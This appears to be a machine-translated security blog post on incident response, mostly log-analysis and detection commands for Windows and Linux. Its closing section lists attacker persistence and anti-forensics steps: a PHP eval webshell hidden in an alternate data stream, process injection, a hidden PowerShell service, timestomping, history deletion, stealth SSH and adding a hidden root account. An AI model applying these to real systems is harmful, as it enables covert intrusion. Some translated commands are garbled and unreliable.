Emergency response learning

Posted by TwistedLogix on Sat, 05 Feb 2022 02:54:21 +0100

Intrusion detection


I Account, process, self start

① Detection account

1. Direct analysis in Windows

Open the cmd window and enter lusrmgr MSc command to check whether there is a suspicious account

2. Log analysis

"eventvwr.msc #Event viewer and export Windows log -- Security
#Analyze with Log Parser

Typical command

1,Query the event of successful login

All events of successful login
LogParser.exe -i:EVT –o:DATAGRID  "SELECT *  FROM c:Security.evtx where EventID=4624"

Events that specify the login time range:
LogParser.exe -i:EVT –o:DATAGRID  "SELECT *  FROM c:Security.evtx where TimeGenerated>'2018-06-19 23:32:11' and TimeGenerated<'2018-06-20 23:34:00' and EventID=4624"

Extract the user name and password of successful login IP: 
LogParser.exe -i:EVT  –o:DATAGRID  "SELECT EXTRACT_TOKEN(Message,13,' ') as EventType,TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as Username,EXTRACT_TOKEN(Message,38,' ') as Loginip FROM c:Security.evtx where EventID=4624"
2,Query the event of login failure

All events of login failure:
LogParser.exe -i:EVT –o:DATAGRID  "SELECT *  FROM c:Security.evtx where EventID=4625"

Extract login failed user names for aggregation statistics:
LogParser.exe  -i:EVT "SELECT  EXTRACT_TOKEN(Message,13,' ')  as EventType,EXTRACT_TOKEN(Message,19,' ') as user,count(EXTRACT_TOKEN(Message,19,' ')) as Times,EXTRACT_TOKEN(Message,39,' ') as Loginip FROM c:Security.evtx where EventID=4625 GROUP BY Message"
3,System history switch on record:

LogParser.exe -i:EVT –o:DATAGRID  "SELECT TimeGenerated,EventID,Message FROM c:System.evtx where EventID=6005 or EventID=6006"

The last one is often used for analysis

3.D shield for analysis
Scan the backdoor class with D-shield

② Detect ports and processes – > (it is better to use D shield to detect directly)
1. Check the port (windows detection)
Using port view and port conversion

netstat -ano Check the current network connection and locate the suspicious ESTABLISHED
netstat -ano Check the current network connection and locate the suspicious ESTABLISHED

②. Detection process

Process without signature verification information
 Process without description information
 Owner of the process
 Is the path of the process legal
CPU Or processes that occupy too much memory resources for a long time

③ View startup items, schedule tasks, services

1. View startup item class

a. In the task manager, perform self starting processes (– > publisher free and quirky direct shutdown)
b. View registry
Typically look at these three registries – > that is, the registry you started

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce Check whether there are startup exceptions on the right
 If yes, please delete it, and it is recommended to install anti-virus software to check and kill the virus and remove the residual virus or Trojan horse.

2. Check planned tasks
In the task scheduler

3. Service self start
services.msc – > detect service type class
④ Check system directory class files
a.C:\Users \ directory
b. Sort directories by time – > find suspicious files

II Tool killing

`2.1 Virus analysis`
PCHunter: http://www.xuetr.com
 Velvet sword: https://www.huorong.cn
Process Explorer: https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker: https://processhacker.sourceforge.io/downloads.php
autoruns: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL: https://www.bleepingcomputer.com/download/otl/
SysInspector: http://download.eset.com.cn/download/detail/?product=sysinspector
`2.2 Virus killing`
Kaspersky: http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe (recommended reason: green version, latest disease)
Poison Bank)
Big spider: http://free.drweb.ru/download+cureit+free (reason for recommendation: scan fast, one download can only take 1 week, update the virus database)
Tinder security software: https://www.huorong.cn
360 Antivirus: http://sd.360.cn/download_center.html
`2.3 Virus dynamics`
CVERC-National Computer Virus Emergency Response Center: http://www.cverc.org.cn
 Micro step online Threat Intelligence Community: https://x.threatbook.cn
 Tinder Safety Forum: http://bbs.huorong.cn/forum-59-1.html
 Drug bully community: http://bbs.duba.net
 Tencent computer housekeeper: http://bbs.guanjia.qq.com/forum-2-1.html
`2.4 Online virus scanning website`
http://www.virscan.org / / multi engine online virus scanning network v1.0 02. Currently, 41 anti-virus engines are supported
https://habo.qq.com / / Tencent Hubble analysis system
https://virusscan.jotti.org //Jotti malware scanning system
http://www.scanvir.com / / detect and analyze computer viruses, mobile phone viruses, suspicious files, etc

webshell killing



2.1 account security
Basic use

who View current login user( tty Local login pts (remote login)
w Check the system information and want to know the user's behavior at a certain time
uptime Check the login time, users and load

Troubleshooting errors

1,Query privileged user(uid Is 0)
[root@localhost ~]# awk -F: '$3==0{print $1}' /etc/passwd
2,Query the account information that can be logged in remotely
[root@localhost ~]# awk '/\$1|\$6/{print $1}' /etc/shadow
3,except root Is there any other account besides the account sudo jurisdiction. If it is not necessary for management, the ordinary account should be deleted sudo jurisdiction
[root@localhost ~]# more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
4,Disable or delete redundant and suspicious accounts
usermod -L user Disable account, account cannot log in,/etc/shadow The second column is!start
userdel user delete user user
userdel -r user Will delete user User, and will/home Directory user Delete the directory together

2.2 historical orders
History is to view the recorded commands executed in history
2.3 check the abnormal port and abnormal process
Abnormal port – > implemented with netstat (network connection command)

netstat -antlp|more
Check the process file path corresponding to pid,
Run ls -l /proc/ P I D / e x e or f i l e / p r o c / PID/exe or file /proc/ PID/exe or file/proc/PID/exe ($pid is the corresponding pid number)

Abnormal process

ps aux | grep pid

2.4 check startup items

runlevel   #View run level commands

Five differences of five levels

0 shutdown
1. Single user mode, which can be imagined as the security mode of windows, is mainly used for system repair
2. Incomplete command line mode without NFS service
The complete command line mode is the standard character interface
4 system retention
5 graphics mode
6 restart

Method of setting running level and setting startup associated program

#Set the operation level of startup
vi /etc/inittab
id=3: initdefault #Which operation level does the system enter directly after startup
#Boot profile
#Therefore, configure -- > startup configuration soft link configuration method
ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S100ssh
#Here, sshd is the script file of the specific service, S100ssh is its soft link, and the beginning of S represents self startup during loading; If it is a script file starting with K, it represents running
#Level needs to be closed when loading

2.5 inspection catalogue
Command use

more /etc/cron.daily/*   #View all files in the directory

Typical catalog


2.6 check abnormal documents

 find /opt -iname "*" -atime 1 -type f
 #Find the file accessed one day ago in the / opt directory

2.7 check system log

Default log storage location:/var/log/
View log configuration: more /etc/rsyslog.conf

Typical contents of files under log

Log analysis skills

1,How many positioning IP In the blasting host root Account number:
grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
| more
 What are the positioning IP During blasting:
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4]
[0-9]|[01]?[0-9][0-9]?)"|uniq -c
 What is a user name dictionary?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print
"$1\n";}'|uniq -c|sort -nr

2,Successful login IP What are:
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
 Date of successful login, user name IP: 
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
3,Add a user kali journal:
Jul 10 00:12:15 localhost useradd[2382]: new group: name=kali, GID=1001
Jul 10 00:12:15 localhost useradd[2382]: new user: name=kali, UID=1001, GID=1001,
, shell=/bin/bash
Jul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali
#grep "useradd" /var/log/secure
4,delete user kali journal:
Jul 10 00:14:17 localhost userdel[2393]: delete user 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed group 'kali' owned by 'kali'
Jul 10 00:14:17 localhost userdel[2393]: removed shadow group 'kali' owned by 'kali'
# grep "userdel" /var/log/secure
5,su Switch users:
Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by
sudo Authorized execution:
sudo -l
Jul 10 00:43:09 localhost sudo: good : TTY=pts/4 ; PWD=/home/good ; USER=root ;
COMMAND=/sbin/shutdown -r now

Find the intrusion backdoor in the code

Code comparison can be used

Typical tools
Beyond Compare

Blackmail virus decryption

Typical website

[360] The blackmail virus search engine supports the retrieval of more than 800 common blackmail viruses,
[Tencent search engine supports more than 300 kinds of common blackmail viruses
[[Qiming] VenusEye Blackmail virus search engine, more than 300 blackmail virus families
[Qianxin] blackmail virus search engine
[Blackmail virus search engine

Typical Toolset

[Tencent Hubble] blackmail software killing tool
[Jinshan drug bully] blackmail virus immunization tool
[[tinder] security tool download
[Ruixing] decryption tool download
[nomoreransom]Ransomware decryption tool set
[MalwareHunterTeam]Ransomware decryption tool set
[Kaspersky free blackmail decryptor
[Avast]Free ransomware decryption tool
[Emsisoft]Free ransomware decryption tool
[Github Project] collection and summary of blackmail virus decryption tools

Log analysis

windows log analysis

① Meaning of event ID

Use 4625 times to check whether it has been blasted
② Login type

Log analysis tool for analysis
LogParser Lizard

Linux Log Analysis

Common commands
grep command
1.grep displays the front and back lines of information

standard unix/linux Lower grep The context is controlled by the following parameters:
grep -C 5 foo file display file Match in file foo The line of the string and the top and bottom five lines
grep -B 5 foo file display foo And the first five lines
grep -A 5 foo file display foo And the last 5 lines
 see grep The method of version number is
grep -V

2.grep finds all files containing a string

grep -rn "hello,world!"
* : Represents all files in the current directory, or a file name
-r Recursive lookup
-n Yes display line number
-R Find all files including subdirectories
-i ignore case

3. How to display some lines of a file:

at input_file | tail -n +1000 | head -n 2000
#Starting from line 1000, 2000 lines are displayed. 1000 ~ 2999 lines are displayed

4. Find the specified file

//Look for the file init in the directory / etc
find /etc -name init

web log analysis

apache environment log analysis

1,List the most visited on the day IP Command:
cut -d- -f 1 log_file|uniq -c | sort -rn | head -20
2,Check how many are there on that day IP visit:
awk '{print $1}' log_file|sort|uniq|wc -l
3,View the number of times a page has been visited:
grep "/index.php" log_file | wc -l
4,View each IP How many pages visited:
awk '{++S[$1]} END {for (a in S) print a,S[a]}' log_file
5,Will each IP The number of pages visited is sorted from small to large:
awk '{++S[$1]} END {for (a in S) print S[a],a}' log_file | sort -n
6,View a IP Which pages were visited:
grep ^ log_file| awk '{print $1,$7}'
7,Remove the page of the day of search engine statistics:
awk '{print $12,$1}' log_file | grep ^\"Mozilla | awk '{print $2}' |sort | uniq | wc -l
8,Check how many are there in one hour at 14:00 on June 21, 2018 IP visit:
awk '{print $4,$1}' log_file | grep 21/Jun/2018:14 | awk '{print $2}'| sort | uniq | wc -l

Permission maintenance


① Hide file
1. File attributes hide files
Completely hide the file (display method – > turn off hiding in folder options)

attrib +s +a +h +r D:\test\project\test .txt

2. Use ADS to hide files

On the server echo A data stream file, such as index.php It's a normal web page file. We can do it like this:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

Shell hidden Jpg (generate a Trojan horse)
② Account hiding
Enable the guest account and add Administrator permission to it
③ Process injection

1.meterpreter session injection
migrate PID port -- > to inject

2.cs injection
Select the process, click inject, then select the listener, and click choose. You can find that cobalt strike bounces back to a new session of the target machine
Is the beacon successfully injected into a process.

That is, the injection is successful

Back door maintenance

1. Registry back door
Commonly used

# Run key
# Winlogon\Userinit key
 There are many similar ones,Key words: Registry startup key.

2. Group policy setting script startup
Run gpedit MSc enters local group policy

Just add the full path – >

as C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

3. Plan task creation

4. Service self start
Establish self starting service

sc create "KeyName" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object
sc description KeyName "Just For Test" //Sets the description string of the service
sc config Name start= auto //Set this service to start automatically
net start Name //Start service

5. Remote control


① Hide file

touch .test.txt #Add a point to hide the file

② Hide time

#Set the time to index PHP time
touch -r index.php webshell.php
#Or directly modify the timestamp to a year, a month, a day. As follows: January 2, 2014.
touch -t 1401021042.30 webshell.php

③ Hide permissions

chattr +i evil.php Lock file
lsattr evil.php Property view
chattr -i evil.php Unlock
rm -rf 1.evil.php Delete file

④ Hide History
1. Delete the specified record

Deletes the specified command from history
history | grep "keyword"
Delete numbers from history
history -d [num]

⑤ Hide remote ssh login record
The stealth login system will not be detected by w, who, last and other instructions.

ssh -T root@ /bin/bash -i

Do not record ssh public key locally ssh directory

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

Maintain – > back door

1. Add user and password

# Create an ordinary user with user name guest and password 123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest
# useradd -p method ` ` is used to store executable system commands, and "$()" can also store command execution statements
useradd -p "$(openssl passwd -1 123456)" guest
# chpasswd method
useradd guest;echo 'guest:123456'|chpasswd
# echo -e method
useradd test;echo -e "123456\n123456\n" |passwd test

Add root user:

# Create a root user with user name guest and password 123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -
d /home/test

Topics: Linux Windows Operation & Maintenance security